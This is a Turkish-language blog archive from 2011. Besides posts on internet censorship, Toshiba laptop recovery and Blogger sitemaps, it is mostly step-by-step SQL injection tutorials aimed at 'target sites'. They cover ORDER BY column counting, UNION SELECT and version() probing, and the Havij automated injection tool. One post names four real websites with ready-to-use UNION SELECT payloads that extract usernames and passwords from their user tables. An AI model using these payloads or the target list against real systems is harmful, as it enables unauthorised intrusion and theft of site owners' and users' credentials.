9 Mayıs 2011 Pazartesi

İnternetime, Bilgisayarıma, Bloguma Dokunma (!)

0 yorum
Demokrasi hep uzaktaki ciger oldu sevgili ülkemde. Her ortam müsait olduğunda dem vurulurken bir olguya bir o kadar da uzak olmak karamizah örneği sanki. Fikrimizi söylerken karşı tarafın konuşmasını hiçbir zaman istemedik. "Özgürlük" diye bağırdık meydanlarda legal-jop'lar eşliğinde ancak hiç dinlemedik karşıdakinin ne dediğini. E balık baştan kokardı bu yüzden baş-bakanımız(!) sanala da sansür uygulamaya başladı. İçeriğe göre kapatmalar olmuştu ancak şimdilerde domain adlarına göre kapatılacakmış siteler. 90 bin civarında sitenin kapatılacağı tahmin ediliyormuş. "BLOG'UMA DOKUNMA" yetmeyecek anlaşılan "İNTERNET'İME DOKUNMA" ya da belki ilerde "BİLGİSAYARIMA DOKUNMA" sloganları duyacağız , söyleyeceğiz.. Şaşırmayın.

Toshiba Laptoplara Recovery İle Format Atma

101 yorum
Arkadaşım sormuştu geçenlerde blogada da yazmanın faydalı olacağını düşündüm. Toshiba Recovery ile format atmak oldukça basittir aslında;
-Pc'yi açarken f8 tuşuna basıyoruz.(işe yaramazsa "fn" tuşu ile birlikte basın)
-Karşımıza gelen seçeneklerden "Bilgisayarınızı Onarın" seçeneğine tıklıyoruz.
-Çıkan seçeneklerden en alttaki "Toshiba Recovery" tıklıyoruz. Format başlıyor. Recovery'de C silinir ancak D'deki veriler kalır. Kolay gelsin.

8 Mayıs 2011 Pazar

Sql İnjection Order By,Union Select,Version() Komutları Kullanımı Videolu Anlatım

0 yorum
Merhaba arkadaşlar. Daha önce blogda order by, union select ve version () komutlarını anlatmıştım. Bu yazılara görsellik kazandırmanın iyi olacağını düşündüm. Bu videoda yazılardan sonra aklınızda oluşan soru işaretleri kalmayacak.
BURDAN indirebilirsiniz.

7 Mayıs 2011 Cumartesi

Sql İnjection "Union Select" ve "Version()" Komutları

0 yorum
Bir önceki yazıda "order by" komutunu göstermiş ve sitedeki table sayısının nasıl bulunacağını anlatmıştım. Bu yazıda "union select" komutuyla siteden bilgi okumaya ve version bulmaya çalışacağız. Diyelim ki order by komutuyla table sayısının 6 olduğunu bulduk o zaman örneğimize devam edelim:
orneksite.com/ders.php?id=5+union+select+1,2,3,4,5,6-- bu adrese girdiğimizde herhangi bir değişiklik olmadıysa panik yapmayın ve hemen id değerinin önüne "-" işareti koyalım. Yani;
orneksite.com/ders.php?id=-5+union+select+1,2,3,4,5,6-- şimdi siteye sayılır yansıdı.
Bundan sonra ne yapacağımız sitede kullanılan veritabanı versiyonuna göre değişir. O yüzden versiyonunu öğrenelim. Diyelim ki sayılardan 3 ekrana yansıdı. 3 sayısını kullanalım.Şöyle ki;
orneksite.com/ders.php?id=-5+union+select+1,2,version(),4,5,6--
Versiyonu öğrendik. Gelecek yazıda buluşmak üzere..

5 Mayıs 2011 Perşembe

Sql İnjection "Order By" Komutu

1 yorum
Sql açığını bulduktan sonra yapılacak ilk iş sitenin "table" sayısını bulmaktır. Order by komutu table bulmak için kullanılır. Hemen örnekle gösterelim:
orneksite.com/ders.php?id=5 açığı bulduğumuz link. Hemen order by komutunu kullanalım.
orneksite.com/ders.php?id=5+order+by+1-- bu kodu yazdıktan sonra sitede hata yoktur. Çünkü her sitede en az bir table vardır. "--" bu çift tire ise adres çubuğuna yazdığımız kodun sql tarafından gönderildiğini belirtir. Hata alana kadar sayımızı büyütelim.
orneksite.com/ders.php?id=5+order+by+2-- hata yok..
orneksite.com/ders.php?id=5+order+by+3-- hata yok..
orneksite.com/ders.php?id=5+order+by+4-- hata yok..
orneksite.com/ders.php?id=5+order+by+5-- diyelim ki 5'de hata aldık. Demek ki table 4 tane. Yani hata aldığımız sayının 1 eksiği. Sql injectionda "Order by" komutunun işlevi budur.

Blogger ve Blogspot Sitemap Yapımı

0 yorum
Sitemap Google Amca'nın dostluğu için önemlidir. Sitemap yani "site haritası" indexlenmede Google Bot'una kolaylık sağlar. Yani daha kolay ve düzenli indexlenirsiniz. Sitemap yapmak için;
-www.google.com/webmaster/tools adresinize sitenizi kayıt edin,
-"Site Haritası" butonuna tıklayın,
-rss.xml yazın. Yani örnek : sqluzmani.blogspot./rss.xml
Artık Google daha yakın...

Sql Açığı Olan Siteler

0 yorum
http://www.bcspeakers.com/product.php?id=-162 union select 1,password,3,4,5,6,7,8,9,10,11,12,13,14,15 from _user--


http://www.lcoastpress.com/book.php?id=-32 union select 1,password,username,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from user--

http://www.foea.scuegypt.edu.eg/view_pages.php?id=-10%20union%20select%201,2,3,group_concat(name,0x3a,paswrd)paswrd,5,6,7,8,9,10%20from%20members--

http://cqap.agri.scuegypt.edu.eg/view_pages.php?id=-10%20union%20select%201,2,3,group_concat(name,0x3a,paswrd),5,6,7,8,9,10%20from%20members--

22 Nisan 2011 Cuma

Hedef Sitede Sql İnjection Açığı Nasıl Bulunur?

0 yorum
En çok sorulan sorulardan biri ;
-Hedef sitede sql injection açığı nasıl bulunur?
Bilindiği üzere sql veritabanındaki kayıtlara ''id'' değeri verir. Biz de bu ''id'' değerini kullanarak siteyi hataya zorlarız. Peki bu nasıl olur? Örneklendirelim ;
Sitemiz sqluzmani.com olsun. Öncelikle sitede ''id'' değeri bulalım. Bunun için sitede biraz gezmek yeterli ancak olur da bulamazsanız google Hoca'ya site:sqluzmani.com yazıp aratırsak bu sitenin google'ın indexlediği bütün sayfalarını görürüz. Arattık ve bulduk diyelim:
sqluzmani.com/ders.php?id=1
Bundan sonra açığı yakalamak için birden fazla yol var ancak ben en çok ('a) ile yapıyorum. Hemen devam edelim ve sitenin sonuna ekleyelim:
sqluzmani.com/ders.php?id=1'a
Bunu yazdığımızda sitede 3 değişik hata olabilir.
-Sitede bir değişiklik olur,
-You have an error in your SQL syntax near......,
-Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in......
Bu hatalardan en az birini aldığınız zaman sql injection var demektir. Ancak her açık olan site hacklenebilir demek yanlış olur. Forbidden ve 404 hatası verebilir daha sonra bunları bypass etmeyi de anlatıcağım. Bu yazının videosunu en yakın zamanda çekeceğim.

19 Nisan 2011 Salı

Sql İnjection Havij Kullanımı Video 2

2 yorum
Havij programının kullanımını anlattığım 2. video. Umarım Yardımcı olur.

Video Link ; http://mikiurl.com/uWziC

Sql İnjection Havij İndir (Resmi Site)

10 yorum
Uzun aradan sonra tekrar merhaba arkadaşlar. Blog'la pek ilginemedim kusura bakmayın. Havij kullanımını gösterdiğim videonun ve havij'in linkleri malumunuz kırılmış. Laptop'ın ekran kartı yandı videoyu tekrar upload edemeyebilrim ama en yakın zamanda yeni videolar çekeceğim. Şimdilik havij'i indirebileceğiniz bir link vereceğim. Havij proğramının resmi sitesidir:

Havij indir :
www.itsecteam.com/en/projects/project1_page2.htm